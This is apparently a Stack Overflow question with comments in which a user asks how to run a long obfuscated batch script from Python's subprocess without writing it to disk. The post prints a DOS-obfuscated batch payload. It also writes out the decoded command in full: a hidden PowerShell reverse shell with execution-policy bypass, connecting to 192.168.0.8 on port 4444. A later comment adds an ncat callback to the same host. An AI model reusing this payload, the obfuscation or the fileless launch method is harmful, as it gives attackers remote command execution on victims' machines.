%ievvLS%%wkpVpB%sfLIZt%Vyooze%4
%ievvLS%%wkpVpB%puCxFu%Vyooze%e
%ievvLS%%wkpVpB%wsugaZ%Vyooze%)
%ievvLS%%wkpVpB%AezOtN%Vyooze%s
%ievvLS%%wkpVpB%ZrFQoE%Vyooze%b
%ievvLS%%wkpVpB%fiyVkV%Vyooze%S
%ievvLS%%wkpVpB%ExCTFh%Vyooze%c
%ievvLS%%wkpVpB%gyNFdw%Vyooze%A
%ievvLS%%wkpVpB%BRYMKx%Vyooze%,
%ievvLS%%wkpVpB%TRZYzF%Vyooze%s
%ievvLS%%wkpVpB%CIQMMX%Vyooze%=
%ievvLS%%wkpVpB%qmUwYG%Vyooze%n
%ievvLS%%wkpVpB%KVRklM%Vyooze%k
%ievvLS%%wkpVpB%QZGQPO%Vyooze%e
%ievvLS%%wkpVpB%VyEfca%Vyooze%,
%ievvLS%%wkpVpB%yWogqE%Vyooze%+
%ievvLS%%wkpVpB%zKwUIB%Vyooze%.
%ievvLS%%wkpVpB%KVbWap%Vyooze%t
%ievvLS%%wkpVpB%nmUVvd%Vyooze%S
%ievvLS%%wkpVpB%YThBKs%Vyooze%e
%ievvLS%%wkpVpB%jPnpEE%Vyooze%$
%ievvLS%%wkpVpB%fHzUsF%Vyooze%-
%ievvLS%%wkpVpB%cidZrH%Vyooze%p
%ievvLS%%wkpVpB%jYWowh%Vyooze%b
%ievvLS%%wkpVpB%hdGebR%Vyooze%e
%ievvLS%%wkpVpB%dMLtrE%Vyooze%.
%ievvLS%%wkpVpB%YveINs%Vyooze%a
%ievvLS%%wkpVpB%hXiNsk%Vyooze%$
%ievvLS%%wkpVpB%JspuwC%Vyooze%y
%ievvLS%%wkpVpB%FhkClr%Vyooze%)
%ievvLS%%wkpVpB%IRdSho%Vyooze%s
%ievvLS%%wkpVpB%SLtieK%Vyooze%i
%ievvLS%%wkpVpB%DFkNZf%Vyooze%p
%ievvLS%%wkpVpB%byHZmn%Vyooze%,
%ievvLS%%wkpVpB%uIYiEx%Vyooze%y
%ievvLS%%wkpVpB%nqgJfu%Vyooze%)
%ievvLS%%wkpVpB%sQIyJP%Vyooze%y
%ievvLS%%wkpVpB%veCYeZ%Vyooze%-
%ievvLS%%wkpVpB%xqTBwM%Vyooze%m
%ievvLS%%wkpVpB%yzfvEI%Vyooze%e
%ievvLS%%wkpVpB%ggagSK%Vyooze%-
%ievvLS%%wkpVpB%tnzBSa%Vyooze%(
%ievvLS%%wkpVpB%AZnYgJ%Vyooze%$
%ievvLS%%wkpVpB%ZktDcc%Vyooze%x
%ievvLS%%wkpVpB%DyXgpo%Vyooze%e
%ievvLS%%wkpVpB%GWgEAO%Vyooze%+
%ievvLS%%wkpVpB%HQFyai%Vyooze%n
%DFkNZf%%aYtudY%%irjwsg%%enSBsx%%dvSfwk%%IRdSho%%QHnlxd%%UWiNix%%zVWJMI%%dZAtth%%VGIGGt%%bjZNgb%%GkdNtI%%cAKQnd%%ETBsfp%%hTyOny%%GRFbHk%%cJjuWa%%CkYJcF%%FFoAxH%%tBRZiX%%VtNXGm%%qfrhZQ%%RqeGCr%%Zglmhu%%jDpetM%%ZEPaZt%%PZAhQE%%KUiPRD%%EhNtDF%%drhsVR%%ecaKBr%%qyshYw%%gGoErC%%iicgwp%%ONfSAG%%uuXleY%%JLjDNG%%JoLLkf%%fxDgrc%%DJGGxa%%lENLpe%%llfuTn%%scHDGY%%irbdlN%%ggagSK%%jdMaQf%%gdEiAe%%aaRxZF%%JMjIsA%%yPaFrp%%wLijYt%%DqqFUe%%EDirHG%%UmTbMA%%aWcjVg%%bazYct%%veCYeZ%%jqDqwK%%oTIsri%%tLtwlC%%KTogWB%%kzXypY%%IWsNVw%%OsCNTu%%RRQxRY%%gBmsax%%YZVBFk%%xFhrQK%%kpfHpK%%kWVqPT%%vHWNup%%chrjvb%%mCtaQh%%JPpYWQ%%GkrvZM%%FGVZHw%%KtIKCj%%ExCTFh%%RtDJBL%%UHCPUJ%%OIwQXq%%mDHjAH%%GbjNUL%%sieRwK%%MwMdUn%%FJQYuS%%yjKYuU%%fRyMmX%%VhkYYP%%LrtgJP%%QkYvhW%%dURSZn%%xkhtRA%%RMaXRB%%DyoRJI%%XGcLdx%%kioxvX%%xkXXpj%%vPKTrX%%FtMucE%%uchBRL%%PWWdKV%%IvRqJe%%ASefaY%%zjqDpZ%%zHEnNT%%pBEdZV%%GmWaYE%%sfLIZt%%fVuhNU%%bnHpsQ%%xcUPic%%dlhKPp%%vWyUxw%%PoMvpn%%jqPpXi%%LNkqZN%%YThBKs%%YpkiEj%%SbmKFf%%CaiOEA%%nflWhI%%FmDPFR%%txrLit%%vsIsVT%%FTVdjD%%UjCimk%%aOgoEU%%VMfRzA%%MRBqSb%%IEjMKs%%inynvl%%qUJzMO%%vMfjpb%%wOPFBR%%gtjHZu%%QEbltk%%MqxcTd%%LqsMDd%%xqTBwM%%tnzBSa%%wbqMXA%%OaMawO%%lhiObE%%KFRkWs%%JqKYDL%%YdykOa%%yipzdb%%vnLGzs%%zVTWlY%%azJfDB%%ArxQhX%%xdwzwX%%mrvGGn%%dFRphs%%Zctznc%%glvGIu%%XCSVEv%%KjeQmp%%FONPqi%%RXSuun%%gDsyHS%%eshNHU%%ZKJjFN%%QyfaOW%%NNEPCc%%kGQOml%%vuXxnd%%BUUTDV%%gTVjRS%%dVgniI%%LzGjLx%%YDneLL%%RvsPaA%%ibLHFr%%VyivCw%%IUAlTA%%nHrsWq%%yzfvEI%%pHIUBj%%ZGgRrg%%dCnJin%%rHpxQx%%dpEwTu%%BsRFIG%%pPojwv%%idZFDZ%%ifoJUu%%KVbWap%%XYZODo%%Uesqeu%%somXos%%wvRrjd%%qtAyxX%%APYBEr%%QZGQPO%%BcTlMZ%%zBAhyj%%GpBugS%%bQZCmK%%aPXDzA%%uIYiEx%%ldwNPM%%hdGebR%%uXxJbQ%%BRYMKx%%btKber%%nTcAgy%%hVakxW%%NMtVis%%KyQSgJ%%YPpLxL%%sQIyJP%%hwybfz%%vJOeTg%%mhTvNf%%fzHCrA%%yFCnrt%%fInUMT%%EAGNuS%%dRNJsS%%gTGpJJ%%TztDap%%WRZxwY%%FhkClr%%LnEamc%%FQZqfJ%%vLOKKS%%hvWbYX%%UJvghl%%fGPzgo%%yEyBBz%%YiUEpa%%nEuzZC%%jPnpEE%%sPRZYa%%LCyfgW%%vSaWHv%%ClyKUn%%MsEACQ%%RSaWXo%%dxNRyr%%eFjCKM%%hVbzsX%%pjenXs%%seccFC%%CbLZMA%%zQnWKg%%jYWowh%%QebYvl%%gsQkle%%roqXKQ%%UGgevE%%YkSXHZ%%sbdbmZ%%LSkzFs%%TlZzCS%%jPeQJV%%xcEIQz%%tyEMcf%%GxLtNZ%%UiulqU%%puCxFu%%rQbIdu%%htsMaa%%uWRlzN%%NuAhJf%%uSiTZI%%hJjPNb%%ZrlSly%%TlEQth%%DYQwnQ%%LMwLJL%%VEQnIj%%joXysY%%iZrDez%%shbjcQ%%THCZSZ%%rRwfZB%%JCmWoA%%UMTWTC%%JFwOCs%%ONSorZ%%UlYljZ%%LVxfDq%%SCmjUU%%gQJjzK%%sWQJCd%%ArWmFH%%NjdNRY%%wOWglP%%UVRILi%%GMXhfK%%fMfvCd%%fiyVkV%%btciJE%%iJYYpt%%xlseey%%jaJPvb%%orFphr%%OoVItv%%lUUgSw%%Bhbfhs%%nEmdCF%%egkEZE%%UrCpMu%%qUcQBx%%aEePoR%%YBXVdH%%byHZmn%%meznVu%%AZnYgJ%%ZpBome%%hzIimF%%SrMIfC%%SPXIPO%%eVxOlI%%zafOwy%%qmUwYG%%ZPPIHa%%ZrFQoE%%EntQkG%%UPVELz%%KVRklM%%MHRuKe%%HgzdZk%%hBIDPk%%yFqTHq%%cmLuEQ%%LWzEMF%%NToSMC%%OtZgRC%%Vvffmb%%QwTWfm%%fWRCWy%%KmPzJu%%CYokBf%%LMnFBs%%ZjwaYj%%KcSbea%%uTKwKe%%xJgOIB%%lcXjvU%%dltLky%%pgJXzu%%xNDTaI%%gPolBw%%qSpGWJ%%fHzUsF%%nmUVvd%%BUuLff%%mlYEVf%%SLtieK%%HVDnjV%%RPFzxm%%jIwBEs%%WMMafK%%SkqvtR%%AEVfVv%%gWvnnR%%nHRlXg%%yAVjPz%%uvvuET%%nNaCHx%%wBGXvH%%HLpJnj%%MBqGCw%%ixVMYQ%%dfmNGZ%%lTsrHH%%CIQMMX%%uJSOMo%%pFeupp%%csQuVL%%sDxitE%%hTgGDN%%QbaFKB%%RSJJmV%%vuoAOo%%dGtojE%%ojTIkt%%jxpppx%%yWogqE%%LEbIVR%%mLwPrN%%jCZgRA%%NVhadk%%tBpmlb%%RWsrou%%OrtgFV%%lXPPKk%%rmUOZV%%tvGGUn%%cidZrH%%KtDiWY%%ZjxiwI%%niuzxk%%fxcuye%%pcGlaU%%YveINs%%kLupsO%%XCqqzI%%sSDxPh%%GWgEAO%%dUaxqc%%bvPUkm%%ubyXjj%%MpKgiP%%XBHMHr%%KvScMe%%qTaqJt%%lNvjfo%%KrKXtJ%%aetodd%%VbUNgH%%muDefP%%fXeWpP%%HLWTwk%%RTSBPU%%wGeZXQ%%eBhXfH%%zacvGV%%wwIFDg%%hGrqpe%%tWJYyl%%JvnVqT%%ZktDcc%%sppmDF%%dMLtrE%%nxEJCq%%HQFyai%%UggYxV%%edlPBe%%eaAVUp%%GBfvbL%%SUBSWd%%wVsTPu%%jABPCg%%zPrdpG%%ekxgcn%%gyNFdw%%YmQvBa%%YSiUvW%%RRrFIa%%cjAYjY%%KoBuJz%%zKwUIB%%ZOLQgr%%nCqvvh%%MwaHfb%%tnDdAp%%pAmnCF%%jJhRex%%FQHbqM%%AezOtN%%eBfpGi%%hXiNsk%%TRZYzF%%VCqTvA%%rXXiCX%%OudrYH%%fSPexO%%sknSXW%%YXflGo%%PyFsfh%%KFhoJL%%IwMxYo%%hQdvWV%%NKmhHs%%pPpVdm%%hxbCDu%%ZWEafr%%DyXgpo%%HDPcoO%%DIcocx%%wigvlt%%tKEnWx%%XyPgUx%%cEeWSu%%PVQyAM%%beJySG%%mixfiD%%njvdLA%%yhlHlV%%PJdQaQ%%Pjofnq%%qCEHBG%%SRtoAn%%CdAogT%%XFEoUn%%lQPCsL%%rknrBO%%SGUHXs%%VyEfca%%OEmZvl%%mwQmaG%%qLFRFO%%bDJVsG%%IHJuCX%%iJtPfr%%JspuwC%%GrHJPW%%NJUNFu%%AUsOMd%%ISuzJx%%WUHpaw%%VFPeku%%OBhRqs%%jhncHK%%pFCnJQ%%nqgJfu%%iqPyXb%%tzAGRF%%PpjUcC%%rEpSCM%%ZbqWuD%%NLqZae%%EYVTKY%%JJTKxe%%FpCmCv%%zfRjdJ%%wNcZmU%%FveJVl%%SoKsrX%%UnBnJr%%TkQLeH%%wsugaZ%%prCvtG%%yhsxhX%%FhvewO%%dfdvBO%%uIPPwq%%ANtRJV%%ykJGGD%%PxMfyp%%HNNpUN%%ttnJNC%%xWXcst%%jykobV%%DsMHCw%%EBcEvu%%vbIvax%%yulYxO%%nTwkIs%
'''

process = subprocess.Popen(['cmd', '/c'], stdin=subprocess.PIPE, stdout=subprocess.PIPE, stderr=subprocess.PIPE)

process.stdin.write(batprogram.encode('ascii'))
process.stdin.flush()

output, error = process.communicate()

print(output.decode('ascii'))
print(error.decode('ascii'))
```

The program just closes itself after "running". The bat script is supposed to connect a specific host and not close itself if the server accepts the connection, it's just a reverse shell encrypted according to this article: https://www.huntress.com/blog/tried-and-true-hacker-technique-dos-obfuscation.
The command behind it is:

```
powershell -NoP -NonI -W Hidden -Exec Bypass -Command New-Object System.Net.Sockets.TCPClient("192.168.0.8",4444);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2  = $sendback + "PS " + (pwd).Path + "> ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()
```

So I was thinking that unlike `os.system`, `subprocess.Popen` does not wait for the program to finish execution so I simply used:

```
process = subprocess.Popen(['cmd.exe', '/c'], stdin=subprocess.PIPE, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
process.communicate(input=batprogram.encode('utf-8'))

process.wait()
```

And I had the same issue. By reading again how I am supposed to use `subprocess.run` I saw that it expected a list with parameters: I used `shlex` which makes a "file not found error"*.

Code:

```
subprocess.call(shlex.split(batprogram))
```

The bat program is itself a bit complex so I want to know if there is a way if python to exec long string as a bat script. Or just imitate `os.system` behaviour using `subprocess.Popen` or `subprocess.run`, just a way to run long string as bat.
It's been 6 hours I'm searching....
I know that the bat alone works, so if anyone can help me I would be glad.

In summary I tried:

- Different syntax of subprocess
- Debugging / checking the output
- Running my bat script alone, trying with a simple and short command (it worked)

Comment: Sorry, but what you've posted, should open `cmd`, and only print three lines reading `demonstrating`, `long` and `program`, respectively, then close due to the `/C` option, (before you even get time to read it). There is nothing there to show us it "is supposed to connect a specific host and not close itself .

Comment: OK I admit whatever this strict community will say. I'm demonstrating trickbot batch obfuscation and I can't run it with subprocess. It look like tones of line like this:
@echo off
set ievvLS=set
%ievvLS% wkpVpB= 
%ievvLS%%wkpVpB%Vyooze==
%ievvLS%%wkpVpB%LVxfDq%Vyooze%o
%ievvLS%%wkpVpB%rRwfZB%Vyooze%C
%ievvLS%%wkpVpB%QebYvl%Vyooze%j
%ievvLS%%wkpVpB%DqqFUe%Vyooze%d

so yeah I can't show the program.
I'm not doing anything illegal, but I just know stackoverflow just hate when it comes to cybersecurity.

Comment: Either submit the entire code in your question itself, or delete it, and find an alternative platform. There is an [Edit] link you can use to make the required changes, or a delete link adjacent to it.

Comment: good imma submit it

Comment: The first argument to `subprocess.run` and `subprocess.check_call` is identical to what you'd use with `Popen`. Your script obviously uses shell features so you need `shell=True` or an explicit invocation of `cmd`, and thus probably not `shlex`. Posting the code is better than not posting the code, but a [mre] would be better still. What do you mean by `os.system` not supporting long strings? Like its documentation says, you should usually prefer `subprocess`, but the differences are elsewhere; if there is a length limit, it's probably shared by both.

Comment: Does `result = subprocess.run(['cmd'], input=batprogram, capture_output=True, check=True, text=True)` work? (Not sure if you need options for `cmd`; I fortunately have no access to Windows.)

Comment: when I use os.system I got a win error saying that it's too long and don't even exec it, so I'm using subprocess. Here is a minimal reproducible example:
```
import subprocess
import os

batprogram = '''
ncat 192.168.0.8 4444
'''
result = subprocess.run(['cmd'], input=batprogram, capture_output=True, check=True, text=True, shell=True)
```
You will get the connection but the script close instantly after running but it's supposed to keep the connection. I think it's the same case with the trick bot batch script but I don't even get the connection because it doesn't read the last line.

Comment: So add `\n` to the end of `batprogram`?

Comment: I don't know what's \n, I searched on internet and I don't have much result.
It still the same issue. As I said that's kinda the same problem I have when you try running netcat with subprocess, it's jsut close after sending the connection....

Comment: Also as I said subprocess expect a list of argument not a RAW command like this.
But as you see I don't really have a list of arguments on my batch script.
I'm close to saying that it's impossible to run the batch script I gave without writing it in a file.